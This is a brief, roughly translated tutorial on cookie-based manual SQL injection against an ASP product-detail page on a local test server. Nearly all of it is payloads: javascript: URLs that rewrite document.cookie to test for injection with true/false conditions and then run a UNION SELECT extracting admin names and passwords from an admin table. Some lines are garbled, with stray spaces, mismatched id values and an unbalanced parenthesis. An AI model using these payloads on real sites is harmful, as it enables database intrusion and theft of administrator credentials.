1. First access the current injection point file name
2. modifying Cookies
Javascript:alert (document.cookie= "id=" +escape ("1137"));
Modify the cookie content of the current site to id=260 and the pop-up window displays the current cookie content
Injection Point :
http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?id=1137
injection Point file name :
Http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?
Javascript:alert (document.cookie= "id=" +escape ("260"));
content :d ocument.cookie= "id=" +escape ("260")
Document.cookie// modify Cookies
"Id=" +escape ("260")
ID is the parameter of our injection point.
260// parameter values
JavaScript// using JS Statements
Alert// pop-up window,
Javascript:alert (document.cookie= "id=" +escape ("1137"));
Modify the cookie content of the current site to id=260 and the pop-up window displays the current cookie content
Determine if there is an injection
Javascript:alert (document.cookie= "id=" +escape ("1137 and 1=1");
Return to normal
Javascript:alert (document.cookie= "id=" +escape ("1137 and 1=221");
return error
Query the specified administrator
Javascript:alert (document.cookie= "id=" +escape ("1137 Union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password, 16,17,18,19,20,21,22 from admin where id=40 "));
Cookie Manual Injection